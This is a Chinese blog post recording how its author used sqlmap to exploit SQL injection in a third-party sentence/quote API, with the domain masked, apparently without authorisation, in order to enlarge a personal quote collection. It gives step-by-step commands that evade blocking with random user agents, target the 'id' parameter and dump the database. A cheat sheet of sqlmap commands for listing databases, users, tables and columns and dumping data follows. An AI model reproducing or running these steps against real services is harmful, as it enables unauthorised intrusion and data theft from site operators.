SQLMAP 注入记录

zmx

2021 年 07 月 13 日

832 次浏览

暂无评论

1386字数

MySQL 资源站 SQL Server

# 引言

我喜欢句子摘抄，看到好句子就像存起来，有时候看网易云评论都可以看一下午，是这样的一种痴迷程度，当前我的数据库中大概有200条句子了，但是网上也有好多类似的API接口，为了丰富我的句子库，那就试着dump一下吧。

# 正文

API接口：https://api.xxxxx.cn/xxx/?type=string&id=1
根据说明文档，可以知道可以根据ID进行返回同一个句子，那么这个地方极有可能是与数据库相关联的，通过F12分析服务器，是nginx做的反向代理或者是直接搭建的web服务器，通过一系列手段(在这里不提及了)，可以得到Web应用是PHP语言写的，那就更好办了，上PentestBox。

## step1.

键入命令`sqlmap -u "https://api.xxxxx.cn/xxx/?type=string&id=1"` 总是循环报错，因为是https请求，那就加上--force-ssl

## step2.

键入命令`sqlmap -u "https://api.xxxxx.xx/xxx/?type=string&id=1" --force-ssl

## step3.

为了避免撞墙和效率，加上随机UA和注入点指向 `sqlmap -u "https://api.xxxxx.xx/xxx/?type=string&id=1" --force-ssl --random-agent -p"id"  `

## step4.

现在已经注入成功了，所以那就为了实现目的，dump吧

```sql
sqlmap -u "https://api.xxxxx.xx/xxx/?type=string&id=1" --force-ssl --random-agent -p"id"  ` -D [databases] --dump --hex
```

![image.png](https://www.zunmx.top/usr/uploads/2021/07/1304181528.png)

# 说明

# **常用命令**

* **sqlmap -u url --dbs //爆数据库**
* **sqlmap -u url --current-db //爆当前库**
* **sqlmap -u url --current-user //爆当前用户**
* **sqlmap -u url --users查看用户权限**
* **sqlmap -u url --tables -D 数据库 //爆表段**
* **sqlmap -u url --columns -T表段 -D 数据库 //爆字段**
* **sqlmap -u url --dump -C字段 -T 表段 -D 数据库 //猜解**
* **sqlmap -d "mysql://账户:密码@地址:端口/数据库" --dbs 直接连**

# **dump乱码问题**

**汉字编码异常（乱码），加上--hex之后管用了，但是cvs打开之后乱码，记事本另存为，编码为ANSI，然后就可以用excel打开了，当然也可以使用navicat进行录入**